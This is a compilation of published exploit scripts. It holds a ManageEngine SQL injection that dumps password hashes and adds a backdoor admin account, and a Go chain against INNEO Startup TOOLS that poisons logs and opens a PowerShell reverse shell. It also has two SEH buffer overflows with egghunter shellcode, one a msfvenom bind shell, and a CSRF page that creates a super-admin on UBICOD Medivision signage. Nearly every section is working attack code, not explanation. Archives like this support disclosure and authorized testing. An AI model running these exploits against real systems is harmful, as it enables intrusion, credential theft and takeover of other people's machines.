# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection # Google Dork: intitle:"Applications Manager Login Screen" # Date: 2020-07-23 # Exploit Author: aldorm # Vendor Homepage: https://www.manageengine.com/ # Software Link: # Version: 12 and 13 before Build 13200 # Tested on: Windows # CVE : 2016-9488 #!/usr/bin/env python2 # App: ManageEngine Applications Manager # Versions: 12 and 13 before build 13200 # CVE: CVE-2016-9488 # Vuln Type: SQL Injection # CVSSv3: 9.8 # # PoC Autor: aldorm # Release date: 23-07-2020 # ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker # [*] Extracting all users: # admin:21232f297a57a5a743894a0e4a801fc3 # reportadmin:21232f297a57a5a743894a0e4a801fc3 # systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3 # [*] Creating new user: # User: hacker # Password: admin # [*] Verifing created user... # Success. import sys import requests import urllib3 import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) target = 'localhost' def get_userpassword(): sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); j = json.loads(r.text) return j def create_user(): sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- ' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- ' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$); -- ' r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); return def main (): if not len(sys.argv) > 2: print "Usage %s <target> <port> [--create-user-hacker]" % sys.argv[0] print "e.g. %s manageengine 8443 " % sys.argv[0] sys.exit(1) global target global port target=sys.argv[1] port=sys.argv[2] print "[*] Extracting all users:" j = get_userpassword() for user in j["0"]: print "\t %s" % user[1] if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker': print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin" create_user() print "[*] Verifing created user..." j = get_userpassword() for user in j["0"]: if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3": print "Success." return print "User not created." if __name__ == '__main__': main()

# Exploit Title: INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution # Date: 2020-07-23 # Exploit Author: Patrick Hener, SySS GmbH # Many credits go to Dr. Benjamin Heß, SySS GmbH for helping with php oddities and the powershell payload # Advisory: SYSS-2020-028 (https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-028.txt) # Vendor Homepage: https://www.inneo.co.uk/en/home.html # Version: Startup TOOLS 2017/2018 # Tested on: Windows 10 x64 # CVE : CVE-2020-15492 /* This exploit was written by Patrick Hener, SySS GmbH */ package main import ( "encoding/base64" "fmt" _ "fmt" "io" "io/ioutil" "log" "net" "net/http" "net/url" "os" "regexp" "strconv" "strings" "golang.org/x/text/encoding/unicode" ) type progress struct { bytes uint64 } func usage() { fmt.Printf("Usage: %s lhost[192.168.x.x] lport[4444] url[http://ip:85] installDir[PROGRA~2/stools] \n\n", os.Args[0]) os.Exit(2) } func readFile(target string, traversal string, path string) (bool, string) { success := true request := fmt.Sprintf("%s%s%s", target, traversal, path) resp, err := http.Get(request) if err != nil { fmt.Println(err) } if resp.Status != "200 OK" { success = false } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { fmt.Println(err) } return success, string(body) } func triggerFile(target string, traversal string, path string) { request := fmt.Sprintf("%s%s%s", target, traversal, path) _, _ = http.Get(request) } func poison(target string, traversal string, path string) (bool, string) { success := true request := fmt.Sprintf("%s%s%s", target, traversal, path) resp, err := http.Get(request) if err != nil { fmt.Println(err) os.Exit(2) } if resp.Status != "404 Not Found" { success = false } defer resp.Body.Close() fmt.Printf("[*] Poisoned: %s\n", path) body, err := ioutil.ReadAll(resp.Body) if err != nil { fmt.Println(err) } return success, string(body) } func parseHostname(body string) string { re := regexp.MustCompile("Service hostname:?.*") hostnameRaw := re.FindAllString(body, -1) hostnameSplit := strings.Split(hostnameRaw[0], ":") hostnameTrimmed := strings.TrimSpace(hostnameSplit[1]) hostnameNoNewline := strings.Replace(hostnameTrimmed, "\n", "", -1) return hostnameNoNewline } func customEscape(sequence string) string { output := url.PathEscape(sequence) output = strings.Replace(output, "+", "%20", -1) output = strings.Replace(output, "=", "%3D", -1) return output } func payloadEscape(sequence string) string { output := url.PathEscape(sequence) output = strings.Replace(output, "=", "%3D", -1) return output } func transferStreams(con net.Conn) { c := make(chan progress) // Read from Reader and write to Writer until EOF copy := func(r io.ReadCloser, w io.WriteCloser) { defer func() { r.Close() w.Close() }() n, err := io.Copy(w, r) if err != nil { fmt.Printf("[%s]: ERROR: %s\n", con.RemoteAddr(), err) } c <- progress{bytes: uint64(n)} } go copy(con, os.Stdout) go copy(os.Stdin, con) p := <-c fmt.Printf("[*] [%s]: Connection has been closed by remote peer, %d bytes has been received\n", con.RemoteAddr(), p.bytes) p = <-c fmt.Printf("[*] [%s]: Local peer has been stopped, %d bytes has been sent\n", con.RemoteAddr(), p.bytes) } func startServer(addr string) { ln, err := net.Listen("tcp", addr) if err != nil { log.Fatalln(err) } fmt.Printf("[+] Now listening on %s\n", addr) con, err := ln.Accept() if err != nil { log.Fatalln(err) } fmt.Printf("[+] [%s]: Connection has been opened. Press 'RETURN' once to start. Enjoy your shell, good sir.\n", con.RemoteAddr()) transferStreams(con) } func stage1(target string, traversal string, installDir string) string { fmt.Printf("[*] Attacking target %s with assumed install path %s\n", target, installDir) fmt.Printf("[*] Trying to read 'sut_server.log' to receive hostname of target at %s%s%s/software/LOG/sut_server.log\n", target, traversal, installDir) path := fmt.Sprintf("%s/software/LOG/sut_server.log", installDir) success, response := readFile(target, traversal, path) if !success { fmt.Printf("[-] It looks like %s%s%s is not there. Provide install_dir to try via args.\n", target, traversal, installDir) os.Exit(2) } hostname := parseHostname(response) return hostname } func stage2(target string, traversal string, installDir string, payloadFinal string) { /* Stage 2 - poison log with php payload Special about that is the length of payload junk has max restriction of about 200 characters Thus we are splitting up the payload escaping the trash we don't need like the 'n' is nesessary to escape DRIVE:\ which will be DRIVE:\n then <?php $cmd=''; $foo= ' n'; $cmd.="part1"; $foo=' n'; $cmd.="part2"; $foo=' .... n'; system(cmd); ?> */ fmt.Println("[*] Poisoning Log with payload") /* Start of the php code */ start := customEscape("<?php $cmd=''; $foo='") success, _ := poison(target, traversal, start) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } /* Looping through payload */ offset := 0 pre := "n'; $cmd.='" post := "'; $foo='" for offset < len(payloadFinal) { payload := payloadFinal[offset : offset+150-len(pre)-len(post)] poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post)) success, _ = poison(target, traversal, poisonPath) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } offset += 150 - len(pre) - len(post) if len(payloadFinal)-offset <= 150-len(pre)-len(post) { break } } /* Send last slice of payload to prevent from out of range error */ payload := payloadFinal[offset:len(payloadFinal)] poisonPath := payloadEscape(fmt.Sprintf("%s%s%s", pre, payload, post)) success, _ = poison(target, traversal, poisonPath) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } /* End of the php code */ end := customEscape("n'; system($cmd); die; ?>") success, _ = poison(target, traversal, end) if !success { fmt.Println("Poisoning failed. Exiting") os.Exit(2) } } func stage3(target string, traversal string, installDir string, hostname string) { logFile := fmt.Sprintf("%s%s%s/software/LOG/sut_server_%s.log\\0.php", target, traversal, installDir, hostname) fmt.Printf("[*] Triggering inclusion of %s\n", logFile) triggerFile(target, traversal, logFile) } func stage4(lhost string, lport int) { /* Listen for socket connection */ addr := fmt.Sprintf("%s:%d", lhost, lport) fmt.Printf("[*] Starting reverse listener at %s\n", addr) startServer(addr) } func main() { if len(os.Args) < 4 { usage() } lhost := os.Args[1] lport, err := strconv.Atoi(os.Args[2]) if err != nil { fmt.Println("lport has to be numeric") os.Exit(2) } target := os.Args[3] var installDir string if len(os.Args) == 4 { installDir = "PROGRA~2/stools" } else { installDir = os.Args[4] } /* Payload definition */ payload := fmt.Sprintf("$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", lhost, lport) /* Convert to base64 UTF-16LE */ encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder() payloadEncoded, _ := encoder.String(payload) payloadEncodedString := base64.StdEncoding.EncodeToString([]byte(payloadEncoded)) /* In webshell we would issue: powershell.exe -exec bypass -EncodedCommand <encoded_payload> */ payloadFinal := fmt.Sprintf("powershell.exe -exec bypass -EncodedCommand %s", payloadEncodedString) /* Traversal to root - default depth would be 4 */ traversal := "/../../../../../../../../../../" /* stage 1 - get hostname */ hostname := stage1(target, traversal, installDir) fmt.Printf("[+] Hostname of target is: %s\n", hostname) /* stage 2 - poisoning */ stage2(target, traversal, installDir, payloadFinal) /* stage 3 - trigger */ go stage3(target, traversal, installDir, hostname) /* stage4 - start listener */ stage4(lhost, lport) }

# Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) # Exploit Author: Sarang Tumne # Date: 2020-07-18 # CVE ID: N/A # Confirmed on release 4.8.0 and 4.5.0 # Vendor: http://www.port-forwarding.net/ # Tested on OS- Windows Vista # Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local # attackers to execute arbitrary code via a long request in the Register feature. ############################################### #!/usr/bin/python file=open("payload.txt","w+b") buffer="\x90"*164 buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # EggHunter buffer+="\x90"*20 shellcode="sarasara" #Egg tag- sarasara shellcode+="\x90"*40 shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" "\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69" "\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e" "\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42" "\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e" "\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51" "\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70" "\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b" "\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52" "\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59" "\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76" "\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d" "\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51" "\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58" "\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36" "\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b" "\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66" "\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f" "\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c" "\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38" "\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31" "\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71" "\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67" "\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50" "\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78" "\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a" "\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55" "\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70" "\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39" "\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e" "\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46" "\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70" "\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62" "\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67" "\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37" "\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36" "\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36" "\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f" "\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46" "\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35" "\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c" "\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c" "\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47" "\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f" "\x39\x45\x41\x41") buffer+="\xeb\xb6\x90\x90" #Backward short jump- nseh buffer+="\x6d\x57\x37\x7c" #PPR- SEH buffer+="A"*200 file.write(buffer+shellcode) file.close()

# Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) # Date: 2020-07-23 # Author: LiquidWorm # Product web page: http://www.medivision.co.kr # CVE: N/A <!-- UBICOD Medivision Digital Signage 1.5.1 CSRF Add Super Admin Vendor: UBICOD Co., Ltd. | MEDIVISION INC. Product web page: http://www.medivision.co.kr Affected version: Firmware 1.5.1 (2013.01.3) Summary: Medivision is a service that provides everything from DID operation to development of DID (Digital Information Display) optimized for hospital environment and production of professional contents, through DID product installation, image, video content planning, design work, and remote control. This is a one-stop solution that solves management at once. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.22 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5574 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5574.php 19.06.2020 --> <html> <body> <form action="http://10.0.39.2/query/user/itSet" method="POST"> <input type="hidden" name="aa[_id]" value="" /> <input type="hidden" name="aa[uid]" value="testingus2" /> <input type="hidden" name="aa[name]" value="TestN" /> <input type="hidden" name="aa[pass]" value="123456" /> <input type="hidden" name="aa[email]" value="[email protected]" /> <input type="hidden" name="aa[mobile]" value="111-222-3333" /> <input type="hidden" name="aa[phone]" value="333-222-1111" /> <input type="hidden" name="aa[approval]" value="+" /> <input type="hidden" name="aa[grp]" value="3" /> <input type="hidden" name="od[]" value="name" /> <input type="hidden" name="ip" value="0" /> <input type="hidden" name="np" value="13" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) # Date: 2020-07-22 # Exploit Author: Eduard Palisek # Vendor Homepage: https://www.cleanersoft.com # Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe # Version: 2.8 Build 20140611 # Tested on: [Windows XP, Professional, Version 2002, SP 3 #!/usr/bin/python file = open("exploit.wav", "wb") # msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind shellcode_bind = b"" shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24" shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31" shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06" shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20" shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91" shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd" shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd" shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b" shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2" shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13" shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98" shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c" shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63" shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16" shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4" shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde" shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1" shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f" shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a" shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48" shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3" shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28" shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e" shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30" shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86" shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93" shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde" shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42" shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61" shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53" shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb" shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf" shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c" shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12" shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9" shellcode_bind += b"\xe8\xaa\x56\xc9\x38" egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nops = "\x90" * 30 junk1 = "A" * 2112 tag = "W00TW00T" junk2 = "B" * (2000-len(shellcode_bind+nops+tag)) eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter file.write(buffer) file.close()